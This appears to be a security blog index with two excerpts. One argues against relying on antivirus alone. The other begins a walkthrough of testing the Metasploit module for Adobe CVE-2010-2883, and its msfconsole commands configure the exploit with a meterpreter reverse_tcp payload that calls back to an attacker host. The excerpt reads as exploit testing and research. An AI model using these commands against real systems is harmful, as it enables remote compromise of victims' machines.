Foolish Reliance On AntiVirus Software

I recently received an email from another Sys Admin pushing the idea of a single corporate  Anti Virus Solution and the importance of getting it in place ASAP and having a single Management console for Reporting, Management etc etc.

Now knowing what I know about this guys company I had to compile a little list of things he might think about or consider implementing before he puts all his eggs in this really rather ‘hole’ y basket.

As far as I know this guys company has few if any of the following suggestions or security polices in place, and I’m sure this is true of many companies in the world.

Continue reading “Foolish Reliance On AntiVirus Software”

New Adobe 0day – CVE-2010-2883

Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why.

I started out by running up Metasploit and setting up the exploit

msf > use exploit/windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.79
LHOST => 192.168.0.79
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.79
SRVHOST => 192.168.0.79
msf exploit(adobe_cooltype_sing) > show options

Module options:

Continue reading “New Adobe 0day – CVE-2010-2883”